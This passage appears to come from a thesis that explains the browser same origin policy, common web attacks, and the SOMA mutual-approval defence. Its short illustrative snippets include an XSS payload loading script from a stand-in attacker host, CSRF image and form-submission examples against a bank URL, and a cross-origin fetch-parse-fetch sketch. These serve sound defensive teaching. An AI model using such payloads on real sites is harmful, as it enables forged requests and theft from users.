(line 7), and a style sheet file (line 6). In the example, none of the links include an explicit domain name, hence the objects they point to are fetched from the same server as the base page. Another possibility, however, is that each link refers to a complete URL, allowing objects referenced by the base page to exist on servers associated with different origins. For each object loaded by a web browser, the origin of that object is defined as the domain name, port number, and protocol through which the element was fetched. JavaScript is currently the most popular scripting language.
Same Origin Policy
The same origin policy we focus on in this thesis is enforced on all JavaScript code which is run within a web browser (we discuss alternate same origin policies in Section ). It limits the ability of JavaScript to read from and modify objects retrieved from a different origin. As each object is loaded, the origin of the object is stored by the web browser as a tag in the meta-data associated with that object. We define the same origin policy as a restriction on the ability for JavaScript tagged with one origin to read from or modify objects tagged with a different origin. In other words, JavaScript tagged with origin A is not allowed to read data tagged with a different origin B (but can still display this data to the user). It also cannot modify data tagged with origin B (i.e., what is displayed to the user is the same as what was received from the server B).
While JavaScript cannot modify data received by server B (because the origin is not the same), it can obscure the data as it is displayed to the user (see Section ). Table 3.1 shows where the same origin policy applies. For each content type, the ability for JavaScript to fetch, read, modify, and execute the content is indicated. For those permissions denoted SO, JavaScript can only perform the operation if the content is tagged as having the same origin as the JavaScript attempting to perform the operation.
[Table 3.1 body not recovered; its rows cover content types including Audio/Video (Plugins) and Audio/Video (HTML5).]
Table 3.1. Current JavaScript access to content loaded by the web browser (e.g., JavaScript may always fetch images, but can only read or modify the contents of an image if it is tagged with the same origin (SO) as the JavaScript attempting the operation).
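The origin comparison underlying the policy can be sketched as follows. The URLs are examples only, and the default-port handling is a simplifying assumption covering just http and https.

    // Reduce a URL to its origin: protocol, host name, and port.
    function origin(urlString) {
      const u = new URL(urlString); // URL parsing is built into browsers and Node.js
      const port = u.port || (u.protocol === 'https:' ? '443' : '80');
      return u.protocol + '//' + u.hostname + ':' + port;
    }

    function sameOrigin(a, b) {
      return origin(a) === origin(b);
    }

    console.log(sameOrigin('http://example.org/page.html', 'http://example.org/face.png'));  // true
    console.log(sameOrigin('http://example.org/page.html', 'http://ads.example.net/ad.js')); // false: host differs
    console.log(sameOrigin('http://example.org/', 'https://example.org/'));                  // false: protocol differs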
1 The contents of a style and JavaScript file can be determined by examining the effect they have on the document after being interpreted by the browser. Style elements are embedded into the document, appearing as part of the DOM. Loaded JavaScript functions can likewise be examined by other JavaScript code through the toString() method (unless the function has been redefined to hide its previous functionality).
In Table 3.1, the ability to modify styles and JavaScript is not limited by the same origin policy. Instead of being self-contained objects which are loaded, tagged, and (potentially) displayed to the user, these two types of objects influence the look of the whole page. A style file does this directly by dictating, for each HTML element on the base page, how it should be displayed (e.g., margins, text colour, borders, etc.). JavaScript, through access to the base HTML page, can also modify the look and feel of the page (and hence overwrite any style dictated by the style file).
In our example of Figure 3.2, one of the objects loaded onto the page was JavaScript code. In general, JavaScript code can be loaded in one of two ways, either through including it directly on the base HTML page, or through loading it as an external script file. While it is obvious that code embedded on the base HTML page is tagged with the same origin as the page (as part of that base page), what is less obvious is the tagged origin of JavaScript code loaded through an external script. While in general, the tagged origin indicates the domain name, port number, and protocol through which an element was fetched, an exception is made for JavaScript. All JavaScript on a page, regardless of where it was originally loaded from, is tagged with the origin of the base HTML page. In tagging all JavaScript with the same origin as the base HTML page, all JavaScript has permission to read and modify the base page, but not other elements tagged with a different origin. Because all JavaScript is tagged with the same origin, any JavaScript loaded can redefine any function. This is the case even if the function was previously defined by a JavaScript source file which came from a different origin.
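The consequence of this shared tagging can be illustrated with a short, hypothetical snippet (the function name and behaviour are invented): a script included from another domain runs with the base page's origin and can therefore silently replace a function defined by the page's own code.

    // Defined by a script served from the base page's own origin.
    function submitPayment(amount) {
      console.log('charging', amount);
    }

    // Later, a script file included from a different domain executes in the same
    // origin, so redefining the function is permitted.
    submitPayment = function (amount) {
      console.log('redirecting', amount, 'somewhere else entirely');
    };

    submitPayment(10); // the replacement runs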
The HTML iframe tag is a special element which can be used to embed one
complete web page within another. It can be thought of as allowing a new base HTML page within another page. All elements (including JavaScript and styles) referenced inside the iframe affect the iframe instead of the base HTML page which contains the iframe. If the iframe element is tagged with a different origin than the base HTML page, the same origin policy applies, preventing the base HTML page from reading content, modifying content, sending messages, and reading replies from the iframe. Similarly, the content in the iframe cannot read, modify, or send messages to the base HTML page. The exception to this rule is if the base HTML page and the HTML page inside the iframe came from different sub-domains within the same base domain (e.g., ca.example.org and rp.example.org). In this case, content from the sub-domains is allowed to communicate if and only if they both indicate their explicit desire by updating the tagged origin through setting the JavaScript variable document.domain to the same common suffix (i.e., example.org).
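A minimal sketch of this opt-in, using the sub-domains from the example above, is shown below. Both the outer page and the page inside the iframe must execute the same assignment before either may script the other; the iframe id used here is hypothetical.

    // Runs in the page served from ca.example.org. The page loaded inside the
    // iframe (from rp.example.org) must execute the same statement.
    document.domain = 'example.org';

    // Once both sides have opted in, the outer page may reach into the iframe.
    const frame = document.getElementById('rpFrame'); // 'rpFrame' is an assumed element id
    console.log(frame.contentDocument.title);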
Document Object Model
The Document Object Model (DOM) is the representation of the base HTML page which is made available to JavaScript. It allows JavaScript to read and modify the base HTML content, as well as content referred to by the base HTML page (subject to the constraints of the same origin policy). It also allows JavaScript to associate event handlers with events that are triggered by the user interacting with the HTML elements (e.g., onclick or onmouseover). We choose not to tie the JavaScript same origin policy to Document Object Model (DOM) access in this thesis because it is possible to load content from a different origin without inserting it into the DOM, as illustrated in Figure 3.3. The JavaScript same origin policy restricts access to objects loaded by the web browser, regardless of whether they have been inserted into the DOM. In implementing SOMA, we extend policy dictating the fetching of content beyond JavaScript, going beyond the DOM interface.
var pic = new Image();
/* Assigning a value to pic.src causes the browser
   to fetch the image. */
pic.src = "http://example.com/image.png";
Figure 3.3. Load an image without inserting it into the DOM.
Application of the Same Origin Policy
The same origin policy restricts JavaScript's ability to read and modify objects that have been fetched by the browser. In Figure 3.4, JavaScript on base HTML page A can read and modify object B, since it comes from the same server (server 1). JavaScript on base HTML page A cannot read or modify C, since it came from server 2. The same origin policy also restricts the ability to read and modify objects associated with other windows (or tabs) which may be open concurrently by the browser. In Figure 3.4, JavaScript on base HTML page A should not be able to read or modify base HTML page D, or the objects E and F.
Asynchronous JavaScript calls (AJAX) result in the contents of an object being returned directly to JavaScript (instead of being treated as a distinct object by the browser). Because JavaScript can read and modify content returned as the result of an AJAX request, these requests are limited by the browser to being performed only to the origin of the base HTML document.
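A brief sketch of the restriction follows, assuming the base HTML page was loaded from http://example.org (the URLs are examples, and the behaviour shown reflects the policy as described here; later cross-origin resource sharing mechanisms relax it in controlled ways).

    // Same origin as the base page: the request is allowed and the response readable.
    const xhr = new XMLHttpRequest();
    xhr.open('GET', 'http://example.org/data.json');
    xhr.onload = function () {
      console.log(xhr.responseText); // JavaScript can read and parse this response
    };
    xhr.send();

    // Different origin: under the policy described above, the browser refuses this.
    const crossXhr = new XMLHttpRequest();
    crossXhr.open('GET', 'http://other.example.net/data.json');
    crossXhr.send();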
As discussed in Section , all JavaScript loaded on a page inherits the origin
of the base page. All JavaScript therefore has full access to the base page
Figure 3.4. A pictorial representation of two different web pages being displayed in a browser concurrently. Page A is from server 1 and includes objects B (also from server 1) and C (from server 2). Page D is from server 3, and includes objects E (from server 2) and F (from server 3).
and any objects embedded on it that came from the same origin as the base page. Mashups involve combining content (including JavaScript) from many different sources on a single web page. With the introduction of mashups, the desire to restrict the access of JavaScript to content (and other JavaScript) coming from the same origin has become an issue. We choose to focus on the currently exploited attack vector of communication between the browser and external servers in this thesis.
Benefits of the Current Same Origin Policy
By limiting the ability to read and modify content tagged with a different origin, many web attacks are prevented. The same origin policy prevents an attacker from performing the following attack (which we term a fetch-parse-fetch attack) in JavaScript: 1) Load an HTML page (or other object) from a different origin. 2) Parse the contents. 3) Craft a subsequent request to the other origin based on the parse result. This restriction is important, as it blocks an attacker from implementing in JavaScript any multi-step attack which relies on the result of a previous request to any web server (other than that with the same origin as the JavaScript) in generating the next request to that server. The results of a request cannot be read (and hence parsed) in JavaScript if they came from a domain other than the origin of the base HTML page; therefore the information required to make a subsequent request based on the first results is not made available to the attacker's JavaScript.
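A hypothetical sketch of such a fetch-parse-fetch attack (URLs, element names, and parameters are illustrative, and the attack only works if the response is readable) shows why step 2 matters; the same origin policy denies the script access to the cross-origin response, so the information needed for step 3 is never available:

var xhr = new XMLHttpRequest();
xhr.open("GET", "http://victim.example.org/account", false);
xhr.send(null);                            /* step 1: fetch from another origin */
var page = xhr.responseText;               /* blocked: cross-origin responses cannot be read */
var m = page.match(/name="token" value="(\w+)"/);
var token = m ? m[1] : null;               /* step 2: parse the result */
var xhr2 = new XMLHttpRequest();
xhr2.open("POST", "http://victim.example.org/transfer", false);
xhr2.send("to=attacker&token=" + token);   /* step 3: craft the follow-up request */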
The restrictions imposed by the same origin policy are critical to the security of JavaScript and the success of the web. Being able to run code on someone else's computer is an inherently dangerous operation. Many have recognized the harm that could come to the host from running arbitrary JavaScript code and hence have implemented strong sandbox mechanisms in an effort to limit the damage that can be caused by potentially malicious JavaScript code. The other target that can be attacked by JavaScript code running at a host, however, is other servers hosting web sites. Given that requests made to remote sites by JavaScript running in a browser cannot easily be tied to the source of the JavaScript by the server receiving the request, JavaScript without the same origin policy would allow the formation of very powerful distributed botnets, allowing attackers to attack other web sites indirectly. The design of the same origin policy attempted to keep the JavaScript code associated with a web application from interfering with other sites. In doing this, it prevented attackers from offloading fetch-parse-fetch attacks against other servers onto unsuspecting clients. While not all attacks are prevented by the same origin policy, there is still substantial benefit in having it in effect.
Limitations of the Same Origin Policy
The design of the same origin policy attempts to limit the damage JavaScript can do to remote servers when running in the browser. It does not stop all attacks. Remaining attacks rely on the fact that many damaging activities can be performed without being able to read the response (i.e., in attacking a web server application, it is sufficient to simply send a malicious request). We now discuss some of the web attacks which are currently prevalent and why the same origin policy does not protect against them. For many of these attacks, there exist many different and inconsistent definitions.
Cross-Site Scripting
Typically, a cross-site scripting attack is carried out as illustrated in Figure 3.5. The attacker sends malicious content to the target server, which replays the content to a user as part of a web page it serves. A cross-site scripting vulnerability is the result of improper sanitization by the server of input received from users of the site before the server uses it as output. A single HTML file can contain a mix of JavaScript code, HTML elements, and text, with the transition between each within the file being determined by the parser. If an attacker can modify the parse tree generated from the HTML file in ways not intended by the web site developer (e.g., turning what was supposed to be text into code, or inserting HTML elements that were not intended), then a cross-site scripting vulnerability exists.
Figure 3.5. A cross-site scripting web attack.
The malicious input which exploits a cross-site scripting vulnerability can either be uploaded and stored on the server (e.g., a blog post stored on a server and shown to everyone viewing the blog), continuing to be sent to users long after the attack has taken place, or it can be passed as a parameter (e.g., a search request) to a dynamic page generated by the web server and returned to a user. Both of these methods of exploit result in additional content provided by the attacker being embedded in the web page served.
A cross-site scripting attack is not prevented by the same origin policy because there is no requirement for JavaScript to read or modify data tagged with a different origin. The malicious content sent to the server by the attacker is simply reflected as part of the resulting web page that the server sends to the client.
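A minimal sketch of such a vulnerable page, written here as a hypothetical server-side JavaScript search handler (the host, port, and payload are illustrative), shows how unsanitized input changes the parse tree of the returned page:

var http = require("http");
var url = require("url");

http.createServer(function (req, res) {
    var q = url.parse(req.url, true).query.q || "";
    res.writeHead(200, { "Content-Type": "text/html" });
    // Vulnerable: q is echoed into the page unsanitized, so a request such as
    //   /search?q=<script src="http://attacker.example/evil.js"></script>
    // turns what was meant to be text into attacker-controlled script.
    res.end("<html><body>Results for: " + q + "</body></html>");
}).listen(8080);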
Cross-Site Request Forgery
A cross-site request forgery attack involves a malicious web server sending to a client browser a page that has embedded content designed to create requests to the target web server. The attack is illustrated in Figure 3.6. In general, the attack involves interaction with other sites that the user may use at the same time as they are viewing the malicious web page.
The server serving the malicious web page need not be intentionally malicious. It is sufficient to compromise an otherwise benign server through attacks such as cross-site scripting (discussed above). While it is common to see the malicious content take the form of JavaScript, it does not have to. An image tag on the attacker-provided page referencing the target URL is sufficient to cause the browser to perform the request (even if the image tag URL does not actually point to an image). Any object pointed to by the attacker-provided page will cause the browser to perform a request. More complex versions of the attack craft the target URL in JavaScript, allowing the web site to perform POST as well as GET requests to the target server.
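As an illustrative sketch (the bank host name and parameters are hypothetical), the attacker's page needs only to reference the target URL; no response ever needs to be read:

<!-- A GET-based forgery: the browser fetches the URL and attaches any
     cookies it holds for bank.example.org, even though no image is returned. -->
<img src="http://bank.example.org/transfer?to=attacker&amount=1000">

<script>
// A POST-based forgery crafted in JavaScript.
var f = document.createElement("form");
f.method = "POST";
f.action = "http://bank.example.org/transfer";
var i = document.createElement("input");
i.name = "to";
i.value = "attacker";
f.appendChild(i);
document.body.appendChild(f);
f.submit();
</script>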
Figure 3.6. A cross-site request forgery attack.
Browsers, by design, submit cookies from a particular web server when sending another request to that same server. One common use of cookies is for storing session information, identifying a user logged onto a web site. Because all related cookies are sent with any web request to the target server, a request sent as a result of the malicious web page (even if that web page is hosted on a different origin) will also contain the appropriate cookies identifying a legitimate user. This feature makes the cross-site request forgery attack more dangerous to users.
The current JavaScript same origin policy does not protect against cross-site request forgery for two reasons: 1) The request to the target server does not have to be performed by JavaScript, and 2) If JavaScript does perform the request, it does not need to be able to process the response (as simply making the request is enough to cause the damage). As discussed earlier, the same origin policy does not limit the ability to make requests.
Clickjacking
The clickjacking attack (also referred to as UI redressing, and not to be confused with click fraud) attempts to convince the user to perform some action against a target site while making it appear as though the action is being performed on some other unrelated site. Sections of the web page delivered to the browser by the target server are obscured by content from the malicious site, leaving visible only those target page elements the attacker wishes the user to see or interact with. In hiding content from the target web page, the malicious site may be able to persuade the user to perform an otherwise unwanted task.
Figure 3.7. A clickjacking attack.
Since elements of the target page are not modified or read by JavaScript (they are instead covered up by the attacker), the JavaScript same origin policy does not protect against this attack. The clickjacking attack is similar to the cross-site request forgery attack discussed above in that it results in undesired web requests to the target server.
Information Stealing
Figure 3.8. An information stealing attack.
The goal of an information stealing attack, as illustrated in Figure 3.8, is to send sensitive information to an attacker-controlled server. Malicious content is injected onto a web page (e.g., through a cross-site scripting attack) which contains (or collects) sensitive information the attacker is interested in (e.g., authentication cookies, passwords, user names, account details, etc.). This malicious content can be inserted as the result of a cross-site scripting attack (discussed above) or another attack. The malicious JavaScript examines elements in the DOM of the page (e.g., form fields and cookies) to obtain sensitive data (because both the malicious JavaScript and the sensitive data originate from the same origin, the malicious JavaScript has read access). The JavaScript then sends this sensitive information to the attacker-controlled server, in a manner similar to the cross-site request forgery requests discussed above.
Bandwidth Stealing
Figure 3.9. A bandwidth stealing attack.
While not strictly a classic security threat, the bandwidth stealing attack illustrated in Figure 3.9 uses resources a victim has paid for or otherwise obtained without properly compensating them. Usually, this attack takes the form of showing images or multimedia from a victim website without also showing the advertisements designed to fund the continued operation of the site. In the extreme, a bandwidth stealing attack leads to a distributed denial of service attack on the victim server, due to a potentially high volume of traffic.
The Same Origin Policy as a Guardian MAC
The JavaScript same origin policy does not rely on the user for enforcement and is applied uniformly to all developers who create web applications. It is thus a guardian mandatory access control. Even though the same origin policy does not protect against all web-based attacks, there are still significant security advantages, as discussed above, which make the same origin policy worthwhile.
The Protection Mechanism
Published in 2008, the Same Origin Mutual Approval (SOMA) policy is designed to strengthen the same origin policy. It does this by addressing the lack of access control surrounding the fetching of external content. While the same origin policy focuses exclusively on restricting the ability of JavaScript to read and modify any object tagged with a different origin, the ability to fetch content from servers is unrestricted, leading to the attacks discussed earlier. While the ability to read and modify content programmatically is specific to JavaScript, content can be fetched as a result of a number of different operations. SOMA restricts fetches regardless of how they are initiated, be it as the result of a JavaScript operation, an HTML tag, or a style tag.
Being a guardian MAC, SOMA is designed to be enabled by site administrators and enforced by browsers, beyond the direct control of web developers. At the browser end, the policy is enforced transparently by any web browser understanding SOMA.
Threat Model
Our threat model for SOMA is the same as was presented in the 2008 work. We assume that site administrators have the ability to create and control the content associated with top-level URLs (static files or scripts) and that web browsers will follow the policy specified at these locations correctly. In contrast, we do assume that the attacker controls arbitrary web servers and can inject content on legitimate servers through attacks such as cross-site scripting. We assume attackers are not able to alter policy files or software on legitimate servers. A goal of SOMA is to restrict communication with a malicious web server when a legitimate web site is accessed, even if the content on that site or its partners has been compromised. A related goal is to restrict communication with a legitimate web server when the user is browsing pages from an attacker-controlled server.
By these assumptions, SOMA is not designed to address situations where an attacker compromises a web server to change policy files, compromises a web browser to circumvent policy checks, or performs man-in-the-middle attacks to intercept and modify communications; nor the problem of users visiting malicious web sites directly, say as part of a phishing attack. While these are all important types of attacks, by focusing on the problem of unauthorized communication between web servers and the browser, SOMA creates a simple, practical solution that works toward addressing all the threats discussed earlier. Mechanisms to address other threats (e.g., Blueprint and the Origin header) largely complement rather than overlap with the protections of SOMA.
SOMA is composed of two parts working together to provide the mutual approval aspects of SOMA. The first part we discuss is the SOMA manifest. This is a file fetched from the same server A as the base HTML page. It lists all servers which A authorizes as sites from which objects may be fetched during the process of building and rendering any HTML page served by A. The idea of restricting communication to a few listed external servers is borrowed from Tahoma. Any server hosting objects that are referenced (either directly or indirectly) and loaded during the course of viewing the page must be listed in site A's SOMA manifest file. Any server origin not listed will not be contacted during loading of the page; any requests for objects from the unlisted origin will return an error. By convention, we assume the origin of the base HTML page is implicitly included in the SOMA manifest. We say that A's manifest lists B when the base page origin A authorizes B to be contacted during the course of viewing a base page which came from A; otherwise, A's manifest does not list B.
As a standard, the paper proposed that the SOMA manifest always be located on any given server at /soma-manifest. For a base HTML page fetched from http://www.example.com/index.html, the complete URL of the associated SOMA manifest would be http://www.example.com/soma-manifest. The actual manifest would contain a header line identifying the file as containing a SOMA manifest, followed by zero or more lines dictating other origins (recall that an origin is defined as protocol, DNS name, and port) which can be contacted while rendering or viewing the page. See Figure 3.10.
Figure 3.10. A sample SOMA manifest file for www.example.com.
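Based on the format just described (a header line followed by zero or more authorized origins), a manifest for www.example.com that authorizes two external origins might look like the following; the listed origins are illustrative:

SOMA manifest
http://ads.example.net
https://static.example.org:8443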
If the origin of the base page chooses not to implement SOMA manifests, the request for /soma-manifest will result in an error (e.g., 404 File Not Found) being returned by the server, or in a file which is not a SOMA manifest (i.e., does not contain a valid SOMA manifest header) being returned. For backward compatibility, no request for content will be blocked if the SOMA manifest does not exist. Table 3.2 indicates the possible scenarios.
SOMA manifest at A                        Result
Does not exist                            All origins can be contacted
Exists, is invalid                        All origins can be contacted
Exists, is valid, and does not list B     B cannot be contacted
Exists, is valid, and lists B             B can be contacted
Table 3.2. SOMA manifest scenarios while browsing a page with base origin A and included content from origin B.
The second part of SOMA involves querying all domains hosting objects referenced by the page which is being viewed in the browser. SOMA queries each domain other than the origin for permission to fetch the content referenced by the page. The approach is similar to the Adobe Flash crossdomain.xml mechanism, but differs in that SOMA returns a single YES or NO response for any given query instead of a list of origins which are allowed to include the content. Returning a single YES/NO response prevents the easy disclosure to an attacker of all sites authorized by a particular origin. We choose to return a list, as opposed to a YES/NO response, for SOMA manifests because similar information can easily be gleaned in most cases by parsing the base HTML page for a list of references.
We say that B approves A when B allows its objects to be fetched for inclusion on base pages originating from A; if B does not wish to have its content fetched while a browser is rendering a page from A, then B does not approve A.
print "SOMA approval n" ;
$policy = array (
'www.example.com' => 'YES' ,
'www.example.org' => 'YES' ) ;
print $policy [$_GET[ 'd' ] ] ;
Figure 3.11. Source code for a simple SOMA approval script.
To indicate that A is authorized by B to include objects from B on its web pages, B needs to provide an accessible script which will answer YES when queried with the domain A. As a standard, we propose that the actual query to B be for the /soma-approval script, with an appended key-value pair whose key is d and whose value is the domain for which approval is being sought. For a request for approval from www.example.net to have its content embedded in pages coming from www.example.com, the complete URL of the SOMA approval request would be http://www.example.net/soma-approval?d=www.example.com. A simple SOMA approval script which would respond to such requests is illustrated in Figure 3.11.
If the administrator of the server hosting the content which is to be embedded in pages chooses not to implement SOMA, the SOMA approval script will not exist and the server will return a 404 (file not found) or some other error for any approval request. If the server administrator chooses to use the /soma-approval script for an unrelated purpose, the header line will not be SOMA approval and the browser should treat this the same as an error response. In both cases, we assume that the administrator of the server from which the content is being fetched for inclusion allows the fetches to take place (so the default is backwards compatible). Table 3.3 lists the possible scenarios when attempting to fetch a SOMA approval.
soma-approval at B              Result
Does not exist                  Objects can be embedded on any page
Exists, is invalid              Objects can be embedded on any page
Exists, responds with NO        A's pages cannot embed B's objects
Exists, responds with YES       A's pages can embed B's objects
Table 3.3. SOMA approval scenarios while browsing a page with base origin A and included content from origin B.
The Combination of Manifests and Approvals
One of the design features of SOMA is that it enforces mutual approval for content inclusion on a web page. If either the administrator for the base page origin or the administrator for the included content origin states that they disallow objects being fetched, then the SOMA-supporting browser will honour this and refuse to fetch the objects. Only if both parties agree is content fetched and included into a web document. Table 3.4 indicates the different possibilities and when content is actually fetched.
Manifest at A        Approval at B         Result
Does not list B      Does not approve A    Objects are not fetched from B
Does not list B      Approves A            Objects are not fetched from B
Lists B              Does not approve A    Objects are not fetched from B
Lists B              Approves A            Objects are fetched from B
Table 3.4. SOMA manifest and approval combinations while browsing a page with base origin A and included content from origin B.
The pseudo-code process a browser follows in fetching a complete page when SOMA is being enforced is shown in Figure 3.12. The pseudo-code illustrates the parallelizable nature of SOMA-related requests. When building a web page in the browser with SOMA enabled, the base HTML page and SOMA manifest are fetched in parallel. Then, for each element from a different origin referenced by the base HTML page, a SOMA approval request is sent. Only when an affirmative answer is received to the SOMA approval request is the actual request for the object sent to the remote server.
SOMA provides some protection against the current web threats discussed earlier. The approach does not rely on end-users knowing anything about the policy, or being involved in enforcement of the policy. This is accomplished by building the enforcement mechanism directly into the browser, similar to how the JavaScript same origin policy works. We do not recommend extending the core SOMA approach to allow end-users to modify either the SOMA manifest or approval responses.
SOMA policies are set up by the system administrators who maintain the web servers, as opposed to the developers who write web applications. In separating SOMA policy from web application development, we remove control from the web developers and place it in the hands of the system administrator. The underlying idea is that the system administrator likely has more of a vested interest in the security of their web site than the developer of the web application, who may be disconnected from the environments it may be used in. We now discuss several other advantages.
function origin(URL) {
    return URL.proto + URL.domain + ':' + URL.port + '/';
}

function buildPage(URL) {
    object approvals = array();
    object manifest = async_fetch(origin(URL) + 'soma-manifest');
    object base = sync_fetch(URL);
    while (size_of(base.unfetched_objects) != 0) {
        /* Process each object referenced by the base page */
        curobj = unqueue(base.unfetched_objects);
        /* Does the manifest allow us to talk to the server? */
        wait_for(manifest);
        if (manifest.allows(origin(curobj.URL)) == 'NO') {
            curobj.data = NULL;
        } elif (approvals[origin(curobj.URL)].inProcess()) {
            /* Waiting for approval response, check back later. */
            queue(base.unfetched_objects, curobj);
        } elif (approvals[origin(curobj.URL)].allowed() == 'YES') {
            /* Server allows its content to be embedded. */
            curobj.data = async_fetch(curobj.URL);
        } elif (approvals[origin(curobj.URL)].allowed() == 'NO') {
            /* Server does not allow its content to be embedded. */
            curobj.data = NULL;
        } else {
            /* Query server - can its content be embedded? */
            approvals[origin(curobj.URL)] =
                async_fetch(origin(curobj.URL) + 'soma-approval?d=' +
                            base.domain);
            /* Requeue request until we get our approval answer */
            queue(base.unfetched_objects, curobj);
        }
    }
}
Figure 3.12. Pseudo-code for the browser SOMA enforcement process.
The lack of a SOMA manifest file defaults to a blanket accept (and likewise the lack of a SOMA approval script defaults to allowing the fetch). With the lack of a SOMA policy being interpreted as an allow, any site choosing not to implement SOMA will continue to work as it does currently. Because SOMA does not replace the JavaScript same origin policy but instead expands it, security is not reduced compared to the current web if one chooses not to use SOMA. For browsers not implementing SOMA, SOMA manifest or approval files will simply not be accessed on the server. For these browsers, again, the web will continue to work as it currently does. Only when both the server and browser support SOMA will the protections start to be enforced. This approach allows incremental deployment with incremental benefit.
In dictating that the first line of a SOMA manifest or approval response be a header containing "SOMA manifest" or "SOMA approval", we can differentiate between responses from servers not understanding SOMA but responding with generic response pages, and responses from servers understanding and responding to SOMA requests.
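A sketch of the check a SOMA-supporting browser might perform (the function name is ours, not part of the proposal):

// Returns true if the response body looks like a SOMA manifest or approval,
// i.e., its first line is the expected header ("SOMA manifest" or "SOMA approval").
function isSomaResponse(body, expectedHeader) {
    var firstLine = body.split("\n")[0].replace(/\s+$/, "");
    return firstLine == expectedHeader;
}
// A generic 404 page or unrelated file fails this check and is treated as
// "no SOMA policy", preserving backwards compatibility.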
Complete SOMA protection is composed of three elements: a browser enforcing SOMA, a SOMA manifest file at the base page origin, and a SOMA approval file for each domain contacted during the course of rendering a web page. If the browser supports SOMA but a manifest does not exist at the base site, the SOMA-enabled browser will still query the SOMA approval script associated with each object included on the web page and adhere to the restrictions returned by the script. Likewise, a base origin distributing a SOMA manifest will have its protections enforced regardless of whether the included servers provide a SOMA approval file. While it is possible to deploy SOMA manifests without SOMA approvals (or vice-versa), deploying both provides maximum benefit.
We now discuss some limitations of the SOMA approach.
Third Party Advertisements
Ad syndication involves allowing an advertiser to sell advertising space to other advertising companies. Under SOMA, if site A decides to sell advertising space on its site to advertiser B, then site A will typically list B on its SOMA manifest. Likewise, B will indicate in its SOMA approval script that A is allowed to embed its content. If advertiser B turns around and wants to sell its space on site A to C, then C will not be listed in the SOMA manifest for A and hence SOMA will not allow content from C to load. In such a case, A must either add C to the SOMA manifest, allowing content from C to appear on the page coming from A, or B must proxy the data so that all ads appearing on the site still come from B (even though B has sold the advertising space to C). Unless B sets up such a proxy, the presence of a SOMA manifest on A will restrict B's ability to perform ad syndication.
We do not see the restriction on ad syndication as a negative aspect of SOMA. Indeed, the practice of ad syndication has contributed significantly to the rise in ad-delivered malware; multiple levels of ad syndication are used in 75% of all ad-delivered malware. The practice of using multiple levels of ad syndication is made difficult by the introduction of SOMA.
SOMA is designed to improve the same origin policy by imposing further constraints upon external inclusions and thus external communications. It does not prevent attacks that do not require external communications, such as code and content injection. SOMA can, however, restrict the outside communication frequently seen in current attack code.
SOMA does not stop attacks to or from mutually approved communication partners. In order to avoid these attacks, it would be necessary to impose finer-grained control or additional separation between components. This sort of protection can be provided by the mashup solutions described in the related work later in this chapter, albeit at the cost of extensive and often complex web site modifications.
SOMA cannot stop attacks on the origin where the entire attack code is injected, if no outside communication is needed for the attack. This includes attacks such as web page defacement, some forms of cross-site scripting, or sandbox-breaking attacks intended for the user's machine. Some complex attacks might be stopped by size restrictions on uploaded content. More subtle attacks might need to be caught by heuristics used to detect cross-site scripting. Some of these solutions are described in the related work later in this chapter.
SOMA cannot stop attacks from malicious servers that do not include content from remote domains. These would include phishing attacks where the legitimate server is not involved.
Self-Contained Malicious Servers
If a malicious server does not serve web pages that rely on non-malicious servers in order to perform an attack (e.g., the malicious server simply hosts a phishing attack where all images and other data originate from the attacker and the data obtained from phishing is sent back to the attacker), then SOMA will not help. SOMA is designed to limit communication in the scenario where at least one of the servers involved is non-malicious.
Extensions to the Core Approach
While the core SOMA approach goes a long way toward improving the security of the web over the same origin policy, there are still improvements that can be made over the core approach.
Third Party Provided Manifests and Approvals
The core idea relies on every server that wishes to take advantage of the protections offered by SOMA hosting either a manifest file, an approval script, or both. There may be, however, sites that would greatly benefit from the deployment of SOMA even if the site administrator is slow to adopt the technology. In this case, it becomes beneficial for an external third party to be able to host manifest files and approval scripts on behalf of the site which is to be protected by SOMA.
To support the use of third party SOMA manifest and approval servers while still not requiring the end-user to administer the scheme, a specific site could be chosen to host these files. This server would be tasked with responding with the correct SOMA manifest file given the base origin (including protocol, DNS name, and port) and with responding to any SOMA approval request (again, given the base domain and included content origin). One way of accomplishing this is with a directory structure that includes the protocol, host name, and port as elements, with the browser translating requests for a site's manifest or approval into requests against the third party server, as sketched below. As with a request for a SOMA approval or manifest file directly from the site, an error response from the third party server would initiate the fallback of allowing all fetches.
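A sketch of the translation a browser might apply, assuming a hypothetical third party policy host (soma.thirdparty.example) and the protocol/host/port directory structure described above:

// Maps a request for the SOMA manifest of a given origin onto the
// hypothetical third party policy server.
function thirdPartyManifestURL(proto, host, port) {
    return "http://soma.thirdparty.example/" +
           proto + "/" + host + "/" + port + "/soma-manifest";
}

// e.g., thirdPartyManifestURL("http", "www.example.com", "80") yields
// "http://soma.thirdparty.example/http/www.example.com/80/soma-manifest".
// An approval request could be translated analogously, ending in
// "/soma-approval?d=" followed by the base page domain.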
As sites continue to implement SOMA, the situation is likely to occur where a SOMA manifest (or approval) is hosted on both the directly involved site and the third party. When this situation occurs, we stipulate that the SOMA manifest (or approval) on the real site should be followed, as opposed to that hosted on the third party site.
Protocol and Port in the Approval Script
The core SOMA approach does not send the protocol or port to the SOMA approval script when asking for approval to include content on a page from a different origin. While at this point we see no reason why the port or protocol would be required by the approval script, the design of the interface to the approval script makes expansion to deal with these attributes trivial. Additional options (namely, t=<protocol> and p=<port>) can be appended to the SOMA approval request, as illustrated below. As an optimization, if the protocol is using the standard port, the port number can be omitted in the SOMA approval request.
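For example, an approval request that also conveys the protocol and a non-standard port might take the following form (host names, protocol, and port are illustrative):

http://www.example.net/soma-approval?d=www.example.com&t=https&p=8443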
SOMA Implemented in HTTP Headers
In our proposal, a request for a SOMA manifest is done in parallel with the request for the main page. A request for a SOMA approval needs to be done before the request for the subsequent content from the server. The reasons for this are twofold.
1. By separating the manifest (and approval) from the object being returned (i.e., either the base page or included content), a different cache policy can be set for each by the web server administrator. As an example, the base page may change frequently while the SOMA manifest does not change. By separating the two, the cache lifetime of the SOMA manifest or approval can be set such that it does not need to be retransmitted alongside each request for a new object from the same web server.
2. By separating the SOMA manifest and approval requests from the request for actual content, the web developer does not need to ensure that their web application always sends a manifest or approval response alongside the desired object. One of the goals of SOMA is to place control of manifests in the hands of the server administrator, not the web developer. While the request for the object could be separated from the SOMA manifest/approval request by the web server, the implementation of such an approach is more involved than simply making a /soma-manifest file available. Because one of the benefits of the SOMA approval is that it protects against cross-site request forgeries (discussed later in this chapter), one must ensure that the actual request is not received by the web application running on the server until after the SOMA approval has been granted. To ensure that the SOMA approval is processed before the request for the content, we separate the two.
